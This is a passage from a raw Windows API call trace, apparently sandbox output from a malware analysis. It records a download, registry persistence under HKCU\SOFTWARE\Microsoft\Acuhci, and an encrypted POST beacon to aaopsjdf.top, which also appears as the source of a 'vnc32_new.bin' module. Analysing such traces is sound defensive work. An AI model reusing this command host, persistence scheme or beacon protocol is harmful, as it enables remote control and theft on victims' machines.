dwMilliseconds=0x0) returned 0x102 [0321.873] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23a487b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23a487b*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.873] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.873] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23a587b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23a587b*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.914] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.914] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23a687b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23a687b*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.914] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.914] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23a787b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23a787b*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.915] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.915] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23a887b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23a887b*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.915] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.915] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23a987b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23a987b*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.917] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.917] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23aa87b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23aa87b*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.917] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.917] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23ab87b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23ab87b*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.917] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.918] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23ac87b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23ac87b*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.918] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.918] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23ad87b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23ad87b*, lpdwNumberOfBytesRead=0x28ff448*=0xff8) returned 1 [0321.921] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.921] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23ae873, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23ae873*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.921] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.921] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23af873, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23af873*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.921] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.921] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23b0873, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b0873*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.922] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.922] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23b1873, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b1873*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.972] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.972] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23b2873, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b2873*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.972] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.973] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23b3873, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b3873*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.973] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.973] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23b4873, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b4873*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.973] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.973] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23b5873, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b5873*, lpdwNumberOfBytesRead=0x28ff448*=0xff7) returned 1 [0321.976] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.976] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23b686a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b686a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.976] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.976] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23b786a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b786a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.976] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.976] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23b886a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b886a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.976] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.976] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23b986a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b986a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.981] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.981] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23ba86a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23ba86a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.981] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.981] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23bb86a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23bb86a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.981] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.981] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23bc86a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23bc86a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.981] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.981] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23bd86a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23bd86a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.984] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.984] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23be86a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23be86a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.984] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.984] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23bf86a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23bf86a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.985] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.985] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23c086a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23c086a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.985] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.985] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23c186a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23c186a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0322.033] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0322.033] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23c286a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23c286a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0322.033] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0322.033] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23c386a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23c386a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0322.033] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0322.033] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23c486a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23c486a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0322.033] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0322.033] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23c586a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23c586a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0322.035] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0322.035] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23c686a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23c686a*, lpdwNumberOfBytesRead=0x28ff448*=0xf26) returned 1 [0322.037] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0322.037] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23c7790, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23c7790*, lpdwNumberOfBytesRead=0x28ff448*=0x0) returned 1 [0322.039] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0322.040] InternetQueryOptionA (in: hInternet=0xcc0008, dwOption=0x15, lpBuffer=0x28ff444, lpdwBufferLength=0x28ff440 | out: lpBuffer=0x28ff444, lpdwBufferLength=0x28ff440) returned 1 [0322.040] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0322.040] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0322.043] CryptImportKey (in: hProv=0x3de630, pbData=0x238e350, dwDataLen=0x120, hPubKey=0x0, dwFlags=0x0, phKey=0x28ff8e4 | out: phKey=0x28ff8e4*=0x45b518) returned 1 [0322.046] CryptCreateHash (in: hProv=0x3de630, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28ff8d8 | out: phHash=0x28ff8d8) returned 1 [0322.046] CryptHashData (hHash=0x45b4d8, pbData=0x391ea30, dwDataLen=0x11410, dwFlags=0x0) returned 1 [0322.046] CryptVerifySignatureW (hHash=0x45b4d8, pbSignature=0x38f0048, dwSigLen=0x100, hPubKey=0x45b518, szDescription=0x0, dwFlags=0x0) returned 1 [0322.046] CryptDestroyHash (hHash=0x45b4d8) returned 1 [0322.046] CreateMutexW (lpMutexAttributes=0x877e4, bInitialOwner=0, lpName="F063546A5853AF5508DB5A15751DB34A") returned 0x5b0 [0322.046] WaitForSingleObject (hHandle=0x5b0, dwMilliseconds=0xffffffff) returned 0x0 [0322.046] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28ff5a0 | out: phkResult=0x28ff5a0*=0x66c) returned 0x0 [0322.046] RegQueryValueExW (in: hKey=0x66c, lpValueName="Eteg", lpReserved=0x0, lpType=0x28ff8d0, lpData=0x0, lpcbData=0x28ff5b4*=0x0 | out: lpType=0x28ff8d0*=0x3, lpData=0x0, lpcbData=0x28ff5b4*=0x31090) returned 0x0 [0322.046] RegQueryValueExW (in: hKey=0x66c, lpValueName="Eteg", lpReserved=0x0, lpType=0x28ff8d0, lpData=0x39f0048, lpcbData=0x28ff5b4*=0x31090 | out: lpType=0x28ff8d0*=0x3, lpData=0x39f0048*, lpcbData=0x28ff5b4*=0x31090) returned 0x0 [0322.047] RegCloseKey (hKey=0x66c) returned 0x0 [0322.062] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x28ff5b0, lpdwDisposition=0x0 | out: phkResult=0x28ff5b0*=0x66c, lpdwDisposition=0x0) returned 0x0 [0322.062] RegSetValueExW (in: hKey=0x66c, lpValueName="Eteg", Reserved=0x0, dwType=0x3, lpData=0x3a1e098*, cbData=0x480b0 | out: lpData=0x3a1e098*) returned 0x0 [0322.065] RegCloseKey (hKey=0x66c) returned 0x0 [0322.076] CryptDestroyKey (hKey=0x45b518) returned 1 [0322.076] CreateMutexW (lpMutexAttributes=0x877e4, bInitialOwner=0, lpName="ABC6B5B774FF9FD7F54EC277098C64EE") returned 0x5b0 [0322.076] WaitForSingleObject (hHandle=0x5b0, dwMilliseconds=0xffffffff) returned 0x0 [0322.076] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28fef08 | out: phkResult=0x28fef08*=0x66c) returned 0x0 [0322.076] RegQueryValueExW (in: hKey=0x66c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fef34, lpData=0x0, lpcbData=0x28fef1c*=0x0 | out: lpType=0x28fef34*=0x3, lpData=0x0, lpcbData=0x28fef1c*=0x6f0) returned 0x0 [0322.076] RegQueryValueExW (in: hKey=0x66c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fef34, lpData=0x238f968, lpcbData=0x28fef1c*=0x6f0 | out: lpType=0x28fef34*=0x3, lpData=0x238f968*, lpcbData=0x28fef1c*=0x6f0) returned 0x0 [0322.076] RegCloseKey (hKey=0x66c) returned 0x0 [0322.076] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x28fef1c, lpdwDisposition=0x0 | out: phkResult=0x28fef1c*=0x66c, lpdwDisposition=0x0) returned 0x0 [0322.076] RegSetValueExW (in: hKey=0x66c, lpValueName="Baywkivyl", Reserved=0x0, dwType=0x3, lpData=0x2350db0*, cbData=0x6f0 | out: lpData=0x2350db0*) returned 0x0 [0322.076] RegCloseKey (hKey=0x66c) returned 0x0 [0322.076] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28fef40 | out: phkResult=0x28fef40*=0x5b0) returned 0x0 [0322.076] RegQueryValueExW (in: hKey=0x5b0, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fef6c, lpData=0x0, lpcbData=0x28fef54*=0x0 | out: lpType=0x28fef6c*=0x3, lpData=0x0, lpcbData=0x28fef54*=0x6f0) returned 0x0 [0322.076] RegQueryValueExW (in: hKey=0x5b0, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fef6c, lpData=0x238f968, lpcbData=0x28fef54*=0x6f0 | out: lpType=0x28fef6c*=0x3, lpData=0x238f968*, lpcbData=0x28fef54*=0x6f0) returned 0x0 [0322.077] RegCloseKey (hKey=0x5b0) returned 0x0 [0322.077] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28ff21c | out: phkResult=0x28ff21c*=0x5b0) returned 0x0 [0322.077] RegQueryValueExW (in: hKey=0x5b0, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff248, lpData=0x0, lpcbData=0x28ff230*=0x0 | out: lpType=0x28ff248*=0x3, lpData=0x0, lpcbData=0x28ff230*=0x6f0) returned 0x0 [0322.077] RegQueryValueExW (in: hKey=0x5b0, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff248, lpData=0x238f968, lpcbData=0x28ff230*=0x6f0 | out: lpType=0x28ff248*=0x3, lpData=0x238f968*, lpcbData=0x28ff230*=0x6f0) returned 0x0 [0322.077] RegCloseKey (hKey=0x5b0) returned 0x0 [0328.083] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28fef1c | out: phkResult=0x28fef1c*=0x5b0) returned 0x0 [0328.083] RegQueryValueExW (in: hKey=0x5b0, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fef48, lpData=0x0, lpcbData=0x28fef30*=0x0 | out: lpType=0x28fef48*=0x3, lpData=0x0, lpcbData=0x28fef30*=0x6f0) returned 0x0 [0328.083] RegQueryValueExW (in: hKey=0x5b0, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fef48, lpData=0x238f968, lpcbData=0x28fef30*=0x6f0 | out: lpType=0x28fef48*=0x3, lpData=0x238f968*, lpcbData=0x28fef30*=0x6f0) returned 0x0 [0328.083] RegCloseKey (hKey=0x5b0) returned 0x0 [0328.083] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28ff89c | out: phkResult=0x28ff89c*=0x5b0) returned 0x0 [0328.083] RegQueryValueExW (in: hKey=0x5b0, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff8c8, lpData=0x0, lpcbData=0x28ff8b0*=0x0 | out: lpType=0x28ff8c8*=0x3, lpData=0x0, lpcbData=0x28ff8b0*=0x6f0) returned 0x0 [0328.083] RegQueryValueExW (in: hKey=0x5b0, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff8c8, lpData=0x238f968, lpcbData=0x28ff8b0*=0x6f0 | out: lpType=0x28ff8c8*=0x3, lpData=0x238f968*, lpcbData=0x28ff8b0*=0x6f0) returned 0x0 [0328.083] RegCloseKey (hKey=0x5b0) returned 0x0 [0328.084] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/vnc32_new.bin", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x28ff8b0 | out: lpUrlComponents=0x28ff8b0) returned 1 [0328.084] GetSystemTime (in: lpSystemTime=0x28ff560 | out: lpSystemTime=0x28ff560*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0x12, wMinute=0x38, wSecond=0x3a, wMilliseconds=0x36f)) [0328.084] SystemTimeToFileTime (in: lpSystemTime=0x28ff560, lpFileTime=0x28ff570 | out: lpFileTime=0x28ff570) returned 1 [0328.084] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x28ff5e8, nSize=0x28ff594 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x28ff594) returned 0x1 [0328.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YKYD69Q\\aETAdzjz", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0328.090] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28ff4e4 | out: phkResult=0x28ff4e4*=0x3cc) returned 0x0 [0328.090] RegQueryValueExW (in: hKey=0x3cc, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff510, lpData=0x0, lpcbData=0x28ff4f8*=0x0 | out: lpType=0x28ff510*=0x3, lpData=0x0, lpcbData=0x28ff4f8*=0x6f0) returned 0x0 [0328.090] RegQueryValueExW (in: hKey=0x3cc, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff510, lpData=0x238f968, lpcbData=0x28ff4f8*=0x6f0 | out: lpType=0x28ff510*=0x3, lpData=0x238f968*, lpcbData=0x28ff4f8*=0x6f0) returned 0x0 [0328.090] RegCloseKey (hKey=0x3cc) returned 0x0 [0328.091] wvnsprintfW (in: pszDest=0x28ff59c, cchDest=10, pszFmt="%u.%u.%u", arglist=0x28ff574 | out: pszDest="2.6.1") returned 5 [0328.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2.6.1", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0328.092] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x28ff756, cbEncoded=0x125, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x28ff4b8, pcbStructInfo=0x28ff49c | out: pvStructInfo=0x28ff4b8, pcbStructInfo=0x28ff49c) returned 1 [0328.092] CryptImportPublicKeyInfo (in: hCryptProv=0x3de630, dwCertEncodingType=0x1, pInfo=0x4240a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x4240d0*, PublicKey.cbData=0x10d, PublicKey.pbData=0x4240d8*, PublicKey.cUnusedBits=0x0), phKey=0x28ff4a8 | out: phKey=0x28ff4a8*=0x45b358) returned 1 [0328.092] LocalFree (hMem=0x4240a0) returned 0x0 [0328.092] wvnsprintfA (in: pszDest=0x235dc28, cchDest=21, pszFmt="%d", arglist=0x28ff3bc | out: pszDest="1515610618") returned 10 [0328.092] CryptEncrypt (in: hKey=0x45b358, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x28ff308*=0x20, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x28ff308*=0x100) returned 1 [0328.092] CryptEncrypt (in: hKey=0x45b358, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2397a80*, pdwDataLen=0x28ff31c*=0x20, dwBufLen=0x100 | out: pbData=0x2397a80*, pdwDataLen=0x28ff31c*=0x100) returned 1 [0328.092] CryptDestroyKey (hKey=0x45b358) returned 1 [0328.092] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/vnc32_new.bin", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x28ff418 | out: lpUrlComponents=0x28ff418) returned 1 [0328.092] wvnsprintfA (in: pszDest=0x238e350, cchDest=516, pszFmt="%s%s", arglist=0x28ff450 | out: pszDest="https://aaopsjdf.top/up9k/r3ZwOs/ZMTfab1M/Db/0/TDZH/g") returned 53 [0328.092] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/up9k/r3ZwOs/ZMTfab1M/Db/0/TDZH/g", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x28ff410 | out: lpUrlComponents=0x28ff410) returned 1 [0328.092] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0328.092] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x2, lpBuffer=0x84024, dwBufferLength=0x4) returned 1 [0328.092] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x8402c, dwBufferLength=0x4) returned 1 [0328.092] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x84034, dwBufferLength=0x4) returned 1 [0328.092] InternetConnectA (hInternet=0xcc0004, lpszServerName="aaopsjdf.top", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0328.092] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/up9k/r3ZwOs/ZMTfab1M/Db/0/TDZH/g", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x84000*="text/html", dwFlags=0x8484f700, dwContext=0x0) returned 0xcc000c [0328.092] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Connection: close\r\n\x91°\r5\x02\x01", dwHeadersLength=0x13, lpOptional=0x238f340, dwOptionalLength=0x2c0) returned 0 [0328.362] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x28ff334, lpdwBufferLength=0x28ff338 | out: lpBuffer=0x28ff334, lpdwBufferLength=0x28ff338) returned 1 [0328.362] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x28ff334, dwBufferLength=0x4) returned 1 [0328.362] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Connection: close\r\n\x91°\r5\x02\x01", dwHeadersLength=0x13, lpOptional=0x238f340*, dwOptionalLength=0x2c0 | out: lpOptional=0x238f340*) returned 1 [0328.959] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x28ff334, lpdwBufferLength=0x28ff338, lpdwIndex=0x0 | out: lpBuffer=0x28ff334*, lpdwBufferLength=0x28ff338*=0x4, lpdwIndex=0x0) returned 1 [0328.959] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x0 [0328.959] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0328.960] InternetQueryOptionA (in: hInternet=0xcc0008, dwOption=0x15, lpBuffer=0x28ff444, lpdwBufferLength=0x28ff440 | out: lpBuffer=0x28ff444, lpdwBufferLength=0x28ff440) returned 1 [0328.960] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0328.960] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0328.960] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28fef1c | out: phkResult=0x28fef1c*=0xb4) returned 0x0 [0328.961] RegQueryValueExW (in: hKey=0xb4, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fef48, lpData=0x0, lpcbData=0x28fef30*=0x0 | out: lpType=0x28fef48*=0x3, lpData=0x0, lpcbData=0x28fef30*=0x6f0) returned 0x0 [0328.961] RegQueryValueExW (in: hKey=0xb4, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fef48, lpData=0x238f968, lpcbData=0x28fef30*=0x6f0 | out: lpType=0x28fef48*=0x3, lpData=0x238f968*, lpcbData=0x28fef30*=0x6f0) returned 0x0 [0328.961] RegCloseKey (hKey=0xb4) returned 0x0 [0328.961] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28ff89c | out: 